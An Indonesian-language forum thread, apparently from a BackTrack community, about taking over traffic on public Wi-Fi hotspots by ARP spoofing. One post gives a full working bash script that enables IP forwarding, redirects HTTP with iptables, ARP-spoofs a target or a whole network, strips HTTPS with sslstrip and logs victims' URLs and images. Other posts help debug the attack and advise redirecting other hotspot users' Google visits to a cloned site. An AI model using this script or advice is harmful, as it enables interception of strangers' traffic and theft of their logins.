menjadi gateway ?
#11
dis script sniff ada ip_forward juga om ikons,,tapi kenapa tetep g bisa konek kalau ane sudah jalanin itu script?krena direct ke 10000?

#12
(07-07-2012, 07:46 AM)konspirasi Wrote: klo arpspoof jangan lupa nyalakan ip forwardingnya Tongue
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward

Sudah diaktifin kak tapi tetap aja semuanya berputar-putar dihalaman login mikrotiknya aja, kan kasian kalau tidak bisa konek Big Grin

(07-07-2012, 09:15 AM)junior.riau18 Wrote: dis script sniff ada ip_forward juga om ikons,,tapi kenapa tetep g bisa konek kalau ane sudah jalanin itu script?krena direct ke 10000?

script sniff yang mana nih? Big Grin
Backtrack
Kisah tentang kita dan Linux

#13
(07-07-2012, 11:39 AM)Backtrack Dragon Wrote:
(07-07-2012, 07:46 AM)konspirasi Wrote: klo arpspoof jangan lupa nyalakan ip forwardingnya Tongue
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward

Sudah diaktifin kak tapi tetap aja semuanya berputar-putar dihalaman login mikrotiknya aja, kan kasian kalau tidak bisa konek Big Grin
iya di mikrotik kampus ane gitu wkwkw muter2 mulu kebingunan ip nya


(07-07-2012, 09:15 AM)junior.riau18 Wrote: dis script sniff ada ip_forward juga om ikons,,tapi kenapa tetep g bisa konek kalau ane sudah jalanin itu script?krena direct ke 10000?

script sniff yang mana nih? Big Grin
yang ini
Code:
#!/bin/bash

# Script for sniffing https connections.
# Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
# Tested on BT5
# BY gHero,cseven,spudgunman.
# Ver 0.3

# ASCII sniff.sh
echo '
              .__  _____  _____           .__
  ______ ____ |__|/ ____\/ ____\     _____|  |__
/  ___//    \|  \   __\\   __\     /  ___/  |  \
\___ \|   |  \  ||  |   |  |       \___ \|   Y  \
/____  >___|  /__||__|   |__|    /\/____  >___|  /
     \/     \/                   \/     \/     \/
'


echo '1' > /proc/sys/net/ipv4/ip_forward


iptables --flush
sleep 1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

# Arpspoof
echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
read ARPOP

if [ "$ARPOP" == "T" ] ; then
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
read IP1
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'; bash' &

else

echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'; bash' &

fi

# SSLSTRIP
xterm -fg green4 -bg grey0 -e 'python /pentest/web/sslstrip/sslstrip.py -a -w ssl_log.txt ; bash' &

# ETTERCAP
xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT' ; bash' &

# URLSNARF
xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt ; bash' &

# DRIFTNET
driftnet -p -i $INT &

#14
(07-07-2012, 02:49 AM)konspirasi Wrote:
(07-05-2012, 11:25 PM)maldini03 Wrote: bro, ada yg tau gak gimna cara buat IP kita jadi default gateway nya IP yg lain,

contoh nih :

gua hostpotan di warkop misalnya , trus agar IP gua jd gateway nya gmana ??

wah teman2 disini udah pada mengerti mengenai ARP Big Grin

jadi kalau ingin menjadi gateway (istilah kerennya MiTM atau orang ketiga Tongue) bisa menggunakan arpspoof atau ettercap
sudah banyak kok tutorialnya disini, search aja dan pelajari Smile


sorry om klu ane comment, ane cuma meluruskan apa yang disebut sebagai arp, biar kita ga salah persepsi Smile (mngkin om jg sudah tahu)

teknik arpspoof itu jalur koneksinya gini

victim - AP - attacker

jadi gateway yg brada pada komputer victim tidak berubah sama sekali, melainkan mac address yang ada pda table arp komputer victim d rubah menjadi mac address komputer attacker

sehingga data yg dkirim akan menuju komputer attacker

jadi arpspoof atau ettercap tidak merubah gateway victim, dan artinya gateway victim tetap sja AP tsb

CMIIW Smile



#15
MITM dengan menggunakan ettercap ....

itu menjadi orang ke 3 ...
Hidup Harus Di Bawa Happy..!!!

#16
(07-07-2012, 09:58 PM)Veronochi Wrote: MITM dengan menggunakan ettercap ....

itu menjadi orang ke 3 ...

yap, itu yg bener Smile

#17
(07-07-2012, 09:15 AM)junior.riau18 Wrote: dis script sniff ada ip_forward juga om ikons,,tapi kenapa tetep g bisa konek kalau ane sudah jalanin itu script?krena direct ke 10000?

iya om iptables nya jangan forward ke port 10000
coba konek dulu ke mikrotik, cek pake wireshark atau apa gitu trus perhatikan loginnya itu di port brp di mikrotiknya
setelah itu rubah semua ke port mikrotik tsb

gud lak Big Grin

(07-07-2012, 11:39 AM)Backtrack Dragon Wrote:
(07-07-2012, 07:46 AM)konspirasi Wrote: klo arpspoof jangan lupa nyalakan ip forwardingnya Tongue
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward

Sudah diaktifin kak tapi tetap aja semuanya berputar-putar dihalaman login mikrotiknya aja, kan kasian kalau tidak bisa konek Big Grin

(07-07-2012, 09:15 AM)junior.riau18 Wrote: dis script sniff ada ip_forward juga om ikons,,tapi kenapa tetep g bisa konek kalau ane sudah jalanin itu script?krena direct ke 10000?

script sniff yang mana nih? Big Grin

cek dulu seperti saran ane diatas ini Smile

(07-07-2012, 09:07 PM)Udalah Wrote:
(07-07-2012, 02:49 AM)konspirasi Wrote:
(07-05-2012, 11:25 PM)maldini03 Wrote: bro, ada yg tau gak gimna cara buat IP kita jadi default gateway nya IP yg lain,

contoh nih :

gua hostpotan di warkop misalnya , trus agar IP gua jd gateway nya gmana ??

wah teman2 disini udah pada mengerti mengenai ARP Big Grin

jadi kalau ingin menjadi gateway (istilah kerennya MiTM atau orang ketiga Tongue) bisa menggunakan arpspoof atau ettercap
sudah banyak kok tutorialnya disini, search aja dan pelajari Smile


sorry om klu ane comment, ane cuma meluruskan apa yang disebut sebagai arp, biar kita ga salah persepsi Smile (mngkin om jg sudah tahu)

teknik arpspoof itu jalur koneksinya gini

victim - AP - attacker

jadi gateway yg brada pada komputer victim tidak berubah sama sekali, melainkan mac address yang ada pda table arp komputer victim d rubah menjadi mac address komputer attacker

sehingga data yg dkirim akan menuju komputer attacker

jadi arpspoof atau ettercap tidak merubah gateway victim, dan artinya gateway victim tetap sja AP tsb

CMIIW Smile

yup benar sekali om, terima kasih udah bantu jelasin Big Grin

#18
(07-07-2012, 02:49 AM)konspirasi Wrote:
(07-05-2012, 11:25 PM)maldini03 Wrote: bro, ada yg tau gak gimna cara buat IP kita jadi default gateway nya IP yg lain,

contoh nih :

gua hostpotan di warkop misalnya , trus agar IP gua jd gateway nya gmana ??

wah teman2 disini udah pada mengerti mengenai ARP Big Grin

jadi kalau ingin menjadi gateway (istilah kerennya MiTM atau orang ketiga Tongue) bisa menggunakan arpspoof atau ettercap
sudah banyak kok tutorialnya disini, search aja dan pelajari Smile


(07-06-2012, 04:16 AM)kakus130908 Wrote: hemm mungkin pake teknik MITM(spoofing) om,
maksud saya om, agar tiap org yg hotspot nge-klik www.google.com tapi itu bukan google, melainkan cloning dari IP saya, maaf om sblumnya nanya trus.. hahahaha
Angry


#19
tampaknya TS tidak mengerti apa yang dia tanyakan .... karena yang dia tanyakan sebenarnya adalah mengalihkan trafik saja .. benar kata teman2 disini .. itu tinggal menggunakan arpspoof atau klo mau gampang pake ettercap saja .... jadi bisa ane katakan bahwa pertanyaan ini sudah di jawab dari tadi ...
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#20
bner kata temen2 tuh om TS ..sebenernya yg di tanyakan sudah di jawab ...
tinggal pilh mau menggunakan arpspoof atau pake ettercap ..

untuk mengalihkan www.google.com (dari komputer korban) => ke IP Attacker
we are not a security owner

..::BACKTRACK INDONESIA::..






Users browsing this thread: 1 Guest(s)